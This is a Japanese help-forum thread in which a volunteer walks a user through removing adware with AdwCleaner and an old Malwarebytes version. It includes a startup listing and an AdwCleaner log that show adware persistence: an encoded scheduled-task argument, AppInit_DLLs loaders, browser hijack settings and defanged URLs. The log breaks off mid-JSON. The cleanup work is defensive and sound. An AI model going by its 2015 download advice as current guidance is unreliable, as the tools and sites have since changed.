qO0v5XT0ixwK+JGrzD1htba/pTrDvYwGvaH7s29jmR+LlOq2UFgiHfYv9FoQb6zYz7e29EqAPnc5qytTFuJW2C7/CE10LROZ5vM58cLo3OmdjY83HdjuVwKhe1XfB6Qi9bAsppHZnrmRcq22cfUJnFBqLWy9YpwX2ufDrYGkADOarlqu94eNUG6qaO6ygx1p5+Nsuss6+UzszffWfSj7
無効 Task 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-3 C:\Program Files (x86)\HQ-V1.4\14ee8834-7bd6-4eba-bb20-1e498ae70e2e-3.exe /XAljV=hpjCgC6ZaECmG1XheHRnE0/IvydM4QBVBkc238SQ+QDR6BY9oQ8+eaP97gS3EYbobIPtYHVwdT7Mwp5lrsjwqftlwBYeqCnRRJOg/d2EN6pJMDq32EpWcArNjfYZ2ZTWMHjyESVpP3JUv1x/ZXQzMQPeAvg3FybHeV5KHGCtWaU5tG2cCiqrL+9rsQ2+R0eLvrU74v1bVDx+Q4YnRSlZ4VfW6mXJqqnvIwoy4nScZlJRA6/XbX1XWl5bn05g98a6fODm+SOf5uLrCNUMR+mb8xTdap8meZtOWHEYBESkdtIuVB67KGsRdHBv4aiBTXJiXOeZNgjD76dzgptpGqFb1TyPthTLpqD5xbgQD4udrVQnfs+/2cHInZ8V25abk/GOwrOa0lnEwzYhwwYhsDyuVRkuCdA3NB/v6EQtiGScJ3hCwjneBOUCD1udg1PPEBQLXOTAQJhslJfnkYiVqZfgW+0Pr7OVgHyn3zln+NUOBVUW/bAKNG6jwUOdlBbkOViqujn4iK0/c5mPE35OE0H0XhMI0tt8g+VH6YQpAFvwsnZxdiY0cb5VMMVh+3rzl0qNaYlerVF4BLnYp4FaPLeDC4GUEpbpDvQ5AixeJOxbu6QD9kcctLLtg9zrPnYB3L92PB8165rPOqZzPCiArJJ6we3Lk7rjipyqyIa7r3yVhPLFVeNZh4E0+P0BFmk/0EgKJH2LMT4o/VsWJBTPbIItG7/w1xno/a3IRQYoMRrdB70Ssz4+AnF1WBzDmCwdgTSbLAN9cX0vIsZMpssN0RIOhoUSq30ipC0pILyXFBEPvH2g0/6tNU/dCQy8BOerXbBkykUZ2WJrHiZOehsLsmLTRQaKAn76WwHK0WZehTRGsu9Bv4WSPjScFCzq3nC1OTXTEIwYe32xZgv9JAxbkpfe0wjIpCE0RrT60qK/zpIw9FNlyD7R4amjHVKOZ5vsh9c+op+RuCkffDQWMiuzy50k6UXjujrNnZsthY7yc3jp9t57gRDBEOEIVleYiv09U+hO
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
無効 Task ASP "C:\Program Files (x86)\RCP\systweakasp.exe" /verysilent
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task ConfigFree Startup Programs TOSHIBA CORPORATION C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
無効 Task Driver Booster SkipUAC (Owner) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe /skipuac
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
無効 Task PC SpeedScan Pro_Owner-PC@Owner C:\Program Files (x86)\Ascentive\PC SpeedScan Pro\PCSpeedScan.exe
無効 Task Performance Center@Logon C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe -m
有効 Task Performance Center_Owner-PC@Owner C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe
有効 Task Uninstaller_SkipUac_Owner IObit C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe /UninstallExplorer
無効 Task Yahoo! Search C:\Users\Owner\AppData\Local\Pay-By-Ads\Yahoo! Search\1.3.15.4\dsrlte.exe

無効 Directory Advanced SystemCare
有効 Directory IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 Drive Advanced SystemCare
有効 Drive Ulead UDF Driver Ulead Systems, Inc. c:\Program Files (x86)\Common Files\Ulead Systems\DVD\USIShex.dll
有効 File IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 File {48F45200-91E6-11CE-8A4F-0080C81A28D4} Trend Micro Inc. C:\Program Files\NTTW\Security\UniClient\UiFrmwrk\tmdshell.dll
有効 Folder IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 Folder {48F45200-91E6-11CE-8A4F-0080C81A28D4} Trend Micro Inc. C:\Program Files\NTTW\Security\UniClient\UiFrmwrk\tmdshell.dll
  • T・T
  • 2015/04/28 (Tue) 23:10:08
CC処置ができないのが妙ですね
作業と報告、ご苦労様です。

>google chromeはプラウザが保護しており実行できませんでした。

あ、またですか。
Chrome本体に作業をブロックされている状態です。
ですがFFやスケジュールの処置もできませんか?
それらはChromeとは違って普通に処置できるはずですが、もしブラウザを起動したままCC作業したなら処置できないのもおかしくないので、この場合はブラウザ終了状態で再度CCで作業してください。
ブラウザ終了状態で作業したならこれは置いといていいです。

では上記の確認後に次の作業もしてください。

下記のツールを準備してください。
「AdwCleaner」(通称:AC)
http://www.bleepingcomputer.com/download/adwcleaner/dl/125/
ファイル直リンです。アクセスしてファイルをデスクトップにでも保存しておいてください。
片付けるときは起動後に「uninstall」ボタンを押せば自動で削除されます。
使い方は下記サイト様に詳しい説明があるのでサンショウウオ↓
http://www.japan-secure.com/entry/adwcleaner.html

Malwarebytes' Anti-Malware(通称・MBAM)
本家サイト
http://www.malwarebytes.org/

ですが、MBAMは現在安定性や動作でかなり難が出ており、普通に使っても正常にスキャンができないバグまで多発中です。
そのため本家サイトから最新版のダウンロードせず、ここではあえて旧バージョンで作業します。

旧バージョンの説明サイト↓
http://fine.tok2.com/home/heto2/0700SecurityApp/Malwarebytes/0001.htm

以下のURLからMBAMの旧バージョンをダウンロードしてください。
http://www.oldapps.com/malwarebytes.php?old_malwarebytes=12090?download
ファイル直リンです。保存しておいてください。

注)インストール時に日本語でインストールすると文字化けすることがあります。英語でインストール後に日本語化してください。
MBAM起動して「Settings」タブ→「Language」→「Japanese」で日本語化できます。

準備できたらMBAMをインストールとアップデートまでしておいてください。
ただし、ここではまだスキャンはしないように。
なお、ここでMBAMの更新で「プログラム」自体は更新せず、定義だけ更新しておいてください。
プログラム本体を更新すると、バグ多発中の最新版になってしまうので、せっかく旧バージョンでインストールした意味がなくなります。

続いてここで一度ACを起動してください。
起動するとまず定義の更新が行われるはずなので、更新だけしてから、それができたらACは一旦終了してください。
ここではスキャンもしなくていいです。

両ツールのアップデートができたらPCをセーフモードで再起動してから、ディスククリーンアップを使ってゴミファイルの掃除してください。


続いてPCをセーフモード起動してから、先に一度起動したACを再度起動してください。
起動したら今度は「スキャン」したあと、そのスキャン終了後に検出されたものがあったら「除去」を押してください。
表示された画面で「はい」を選択すると処置開始されます。

処置完了したらそこでPCを通常モードで再起動してください。

再起動後にACのあらたなログが出るので、それをデスクトップにでも保存しておいてください。
ですが、もし作業後にログが出ないorわからない場合はマイコンピュータのCドライブを開くとその直下に以下のような名前のファイルが作成されているので、それがACのログです。
>AdwCleaner[英数字].txt
同じような名前のログが複数ある時は、作成日時が作業処置時のファイルが対象のログです。

ACでの作業ができたら次はMBAMの作業です。
セーフモードのままMBAM起動してスキャンしてください。
MBAM起動したら「スキャナー」タブから「フルスキャン」です。
対象ドライブはCを含めて全ドライブを選択してください。
ですが、もし「フルスキャン」というボタンが表示されない場合はMBAMを最新版に更新してしまった可能性があるので、この時は「カスタムスキャン」を選択してください。
この操作が最新版MBAMでのフルスキャンにあたります。
スキャン対象は全ドライブを選択(チェック)してください。時間はかかりますができるだけ細かくスキャンするためです。
順番はどちらからでもいいですが、なにか検出されたらそれを選択して「remove」(隔離)したあと、再起動を促す表示が出たらそこで一度PCを再起動してください。
もし再起動表示が出ないときは手動で再起動してください。

またMBAMスキャン終了後、「詳細を表示」を押すとその結果が表示されるはずなので、そこで「ログを保存」を押すとそのログが保存可能になります。
そのログをデスクトップにでも保存しておいてください。
このログ確認が特に重要なので、忘れないようにお願いします。

このあとしばらくPC状態を様子見後、作業後に保存したACとMBAMのログを返信に貼り付けて、それを状態報告とともにレスで見せてください。
  • 悪代官
  • 2015/04/29 (Wed) 21:27:21
Re: パソコン動作緩慢・広告類がひどい
すみません
MBAMダウンロードをしようと
http://www.oldapps.com/malwarebytes.php?old_malwarebytes=12090?download
にはいると以下のようになってしまうのですが、どうしたら良いでしょうか?

  • T・T
  • 2015/04/29 (Wed) 22:31:21
Re: パソコン動作緩慢・広告類がひどい
MBAMha
なんとかダウンロードする事が出来ました。(カスタムスキャンだったので最新版かもしれないですが…)
>FFやスケジュールの処置もできませんか?
は処置が出来居なかったのはgoogle chromeだけでFFもスケジュールも行う事は出来ました。

だいぶ、広告類は減りました。まだ動作が重いのですがどうしたら良いですか?

# AdwCleaner v4.202 - ログファイルの作成日 29/04/2015 作成時間 22:18:27
# 更新日 23/04/2015 作成元 Xplode
# データベース : 2015-04-27.1 [サーバー]
# オペレーティングシステム : Windows 7 Home Premium Service Pack 1 (x64)
# ユーザー名 : Owner - OWNER-PC
# 実行場所 : C:\Users\Owner\Downloads\adwcleaner_4.202.exe
# オプション : スキャン

***** [ サービス ] *****

サービス 検出済み項目 : Scores
サービス 検出済み項目 : SPPD
サービス 検出済み項目 : {6fcd6092-9615-4f7f-8898-8df53980e5d2}w64
サービス 検出済み項目 : F06DEFF2-5B9C-490D-910F-35D3A9119622

***** [ ファイル / フォルダ ] *****

ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ifohbjbgfchkkfhphahclmkpgejiplfo
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ifohbjbgfchkkfhphahclmkpgejiplfo
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0.localstorage
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0.localstorage
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0.localstorage-journal
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ifohbjbgfchkkfhphahclmkpgejiplfo_0.localstorage-journal
ファイル 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_pfhnkainfgebjkhaoadlkjgjhhgpbohg_0.localstorage
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\searchplugins\default-search.xml
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\searchplugins\dsrlte.xml
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\searchplugins\trovi-search.xml
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\user.js
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\databases\chrome-extension_ffhfoagmjcnkolneahbpagjcjjaeofbg_0
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Local Extension Settings\ffhfoagmjcnkolneahbpagjcjjaeofbg
ファイル 検出済み項目 : C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Local Storage\chrome-extension_ffhfoagmjcnkolneahbpagjcjjaeofbg_0.localstorage
ファイル 検出済み項目 : C:\windows\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb
ファイル 検出済み項目 : C:\windows\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb
ファイル 検出済み項目 : C:\windows\Reimage.ini
ファイル 検出済み項目 : C:\windows\System32\drivers\{6fcd6092-9615-4f7f-8898-8df53980e5d2}w64.sys
ファイル 検出済み項目 : C:\windows\System32\roboot64.exe
フォルダ 検出済み項目 : C:\Program Files (x86)\baidu
フォルダ 検出済み項目 : C:\Program Files (x86)\FoxTab
フォルダ 検出済み項目 : C:\Program Files (x86)\globalUpdate
フォルダ 検出済み項目 : C:\Program Files (x86)\Hold Page
フォルダ 検出済み項目 : C:\Program Files (x86)\MyPC Backup
フォルダ 検出済み項目 : C:\Program Files (x86)\RegClean Pro
フォルダ 検出済み項目 : C:\Program Files (x86)\SearchProtect
フォルダ 検出済み項目 : C:\ProgramData\374311380
フォルダ 検出済み項目 : C:\ProgramData\4e937783cf542897
フォルダ 検出済み項目 : C:\ProgramData\baidu
フォルダ 検出済み項目 : C:\ProgramData\SaverAddon
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\globalUpdate
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\flnadehcbdhdllijcpefnpbbipaipbee
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ifohbjbgfchkkfhphahclmkpgejiplfo
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ifohbjbgfchkkfhphahclmkpgejiplfo
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\pay-by-ads
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\SearchProtect
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Local\Systweak
フォルダ 検出済み項目 : C:\Users\Owner\AppData\LocalLow\baidu
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\baidu
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\cloudbkp
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\FirefoxToolbar
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\FoxTab
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VOPackage
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\Extensions\Na@4skpeF6a.org
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\Extensions\w1@bVfSQOc5.com
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Extensions\ffhfoagmjcnkolneahbpagjcjjaeofbg
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\Systweak
フォルダ 検出済み項目 : C:\Users\Owner\AppData\Roaming\VOPackage
フォルダ 検出済み項目 : C:\Users\Owner\Documents\baidu

***** [ スケジュールタスク ] *****

タスク 検出済み項目 : ASP
タスク 検出済み項目 : Yahoo! Search
タスク 検出済み項目 : 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-11
タスク 検出済み項目 : 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-3
タスク 検出済み項目 : 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-6
タスク 検出済み項目 : 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-7
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-1
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-11
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-3
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-4
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-5
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-5_user
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-6
タスク 検出済み項目 : 89e02368-f8c7-495c-aabd-c27cc648d509-7
タスク 検出済み項目 : d3490901-808d-490f-befe-ede48292dfd6

***** [ ショートカット ] *****


***** [ レジストリ ] *****

キー 検出済み項目 : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
キー 検出済み項目 : HKCU\Software\AppDataLow\Software\Crossrider
キー 検出済み項目 : HKCU\Software\Baidu
キー 検出済み項目 : HKCU\Software\Classes\keepmysearch
キー 検出済み項目 : HKCU\Software\GlobalUpdate
キー 検出済み項目 : HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
キー 検出済み項目 : HKCU\Software\InstallCore
キー 検出済み項目 : HKCU\Software\InstalledBrowserExtensions
キー 検出済み項目 : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4D9101D6-5BA0-4048-BDDE-7E2DF54C8C47}
キー 検出済み項目 : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! Search
キー 検出済み項目 : HKCU\Software\Optimizer Pro
キー 検出済み項目 : HKCU\Software\SearchProtectINT
キー 検出済み項目 : HKCU\Software\Softonic
キー 検出済み項目 : HKCU\Software\systweak
キー 検出済み項目 : HKCU\Software\Tune
キー 検出済み項目 : [x64] HKCU\Software\Baidu
キー 検出済み項目 : [x64] HKCU\Software\GlobalUpdate
キー 検出済み項目 : [x64] HKCU\Software\InstallCore
キー 検出済み項目 : [x64] HKCU\Software\InstalledBrowserExtensions
キー 検出済み項目 : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : [x64] HKCU\Software\Optimizer Pro
キー 検出済み項目 : [x64] HKCU\Software\SearchProtectINT
キー 検出済み項目 : [x64] HKCU\Software\Softonic
キー 検出済み項目 : [x64] HKCU\Software\systweak
キー 検出済み項目 : [x64] HKCU\Software\Tune
キー 検出済み項目 : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
キー 検出済み項目 : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
キー 検出済み項目 : HKLM\SOFTWARE\0bcf5df0-4fd6-4897-a645-0ee111b55f16
キー 検出済み項目 : HKLM\SOFTWARE\54eb8b87-af54-44b4-ae28-6845849b7bf2
キー 検出済み項目 : HKLM\SOFTWARE\Baidu
キー 検出済み項目 : HKLM\SOFTWARE\Classes\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{4AA46D49-459F-4358-B4D1-169048547C23}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.CoreClass.1
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassSvc.1.0
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3COMClassService.1.0
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc
キー 検出済み項目 : HKLM\SOFTWARE\Classes\globalUpdateUpdate.Update3WebSvc.1.0
キー 検出済み項目 : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
キー 検出済み項目 : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
キー 検出済み項目 : HKLM\SOFTWARE\Conduit
キー 検出済み項目 : HKLM\SOFTWARE\GlobalUpdate
キー 検出済み項目 : HKLM\SOFTWARE\Hold Page
キー 検出済み項目 : HKLM\SOFTWARE\InstalledBrowserExtensions
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{10A0E600-D246-BD63-F465-4C849C688998}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{10A0E600-D246-BD63-F465-4C849C688998}
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect
キー 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage
キー 検出済み項目 : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10
キー 検出済み項目 : HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4
キー 検出済み項目 : HKLM\SOFTWARE\SearchProtect
キー 検出済み項目 : HKLM\SOFTWARE\SmdmF
キー 検出済み項目 : HKLM\SOFTWARE\systweak
キー 検出済み項目 : HKLM\SOFTWARE\Tune
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Baidu
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Classes\CLSID\{4AA46D49-459F-4358-B4D1-169048547C23}
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
キー 検出済み項目 : [x64] HKLM\SOFTWARE\InstalledBrowserExtensions
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2492}
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Reimage Repair
キー 検出済み項目 : [x64] HKLM\SOFTWARE\Reimage
データ 検出済み項目 : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\progra~2\searchprotect\searchprotect\bin\spvc32loader.dll
データ 検出済み項目 : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll

***** [ Webブラウザ ] *****

-\\ Internet Explorer v11.0.9600.17728

設定 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Secondary Start Pages] - hxxp://jp.hao123.com/?tn=ime_inner_hp_26_hao123_jp&business_platform
設定 検出済み項目 : HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls [Tabs] - hxxp://jp.hao123.com/?tn=incore_pay_hp_01_hao123_jp

-\\ Mozilla Firefox v

[d3m0wihh.default] - ライン 検出済み項目 : user_pref("browser.newtab.url", "hxxp://rts.dsrlte.com/?m=tab&affID=na");
[d3m0wihh.default] - ライン 検出済み項目 : user_pref("browser.search.order.1", "default-search.net");
[d3m0wihh.default] - ライン 検出済み項目 : user_pref("browser.startup.homepage", "hxxp://jp.hao123.com/?tn=incore_pay_hp_ex01_hao123_jp");
[d3m0wihh.default] - ライン 検出済み項目 : user_pref("extensions.ahermanthorne45outlookcom61787.61787.internaldb.monetization_plugin_bundledUrls.value", "%7B%22dealply_s%22%3A%7B%22urls%22%3A%5B%22ssfiles.com%22%5D%7D%2C%22dealply_p%22%3A%7B%2[...]
[d3m0wihh.default] - ライン 検出済み項目 : user_pref("extensions.crossrider.bic", "147c4ad524626277c6ef713cdd5c2111");
[d3m0wihh.default] - ライン 検出済み項目 : user_pref("keyword.URL", "hxxp://rts.dsrlte.com/?q=");

-\\ Google Chrome v42.0.2311.135

[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - 検出済み項目 [Extension] : ifohbjbgfchkkfhphahclmkpgejiplfo
[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - 検出済み項目 [Extension] : fcfenmboojpjinhpgggodefccipikbpd
[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - 検出済み項目 [Extension] : flnadehcbdhdllijcpefnpbbipaipbee
[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - 検出済み項目 [Extension] : ifohbjbgfchkkfhphahclmkpgejiplfo
[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - 検出済み項目 [Default_Search_Provider_Data] : {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}{google:contextualSearchVersion}ie={inputEncoding}",
"usage_count": 0
}
},
"extensions": {
"settings": {
"ahfgeienlihckogmohjhadlkjgocpleb": {
"active_bit": true,
"active_permissions": {
"api": [ "management", "system.display", "system.storage", "webstorePrivate", "system.cpu", "system.memory", "system.network" ],
"manifest_permissions": [ ]
},
"app_launcher_ordinal": "n",
"commands": {

},
"content_settings": [ ],
"creation_flags": 1,
"ephemeral_app": false,
"events": [ ],
"from_bookmark": false,
"from_webstore": false,
"incognito_content_settings": [ ],
"incognito_preferences": {

},
"install_time": "13057562412300622",
"last_launch_time": "13073798937351184",
"location": 5,
"manifest": {
"app": {
"launch": {
"web_url": "hxxps://chrome.google.com/webstore"
},
"urls": [ "hxxps://chrome.google.com/webstore" ]
},
"description": "Chrome Web Store",
"icons": {
"128": "webstore_icon_128.png",
"16": "webstore_icon_16.png"
},
"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB",
"name": "ストア",
"permissions": [ "webstorePrivate", "management" ],
"version": "0.2"
},
"page_ordinal": "n",
"path": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\37.0.2062.124\\resources\\web_store",
"preferences": {

},
"regular_only_preferences": {

},
"was_installed_by_default": false,
"was_installed_by_oem": false
},
"bepbmhgboaologfdajaanbcjmnhjmhfn": {
"disable_reasons": 1,
"state": 0
},
"eemcgdkfndhakfknompkggombfjjjeno": {
"active_permissions": {
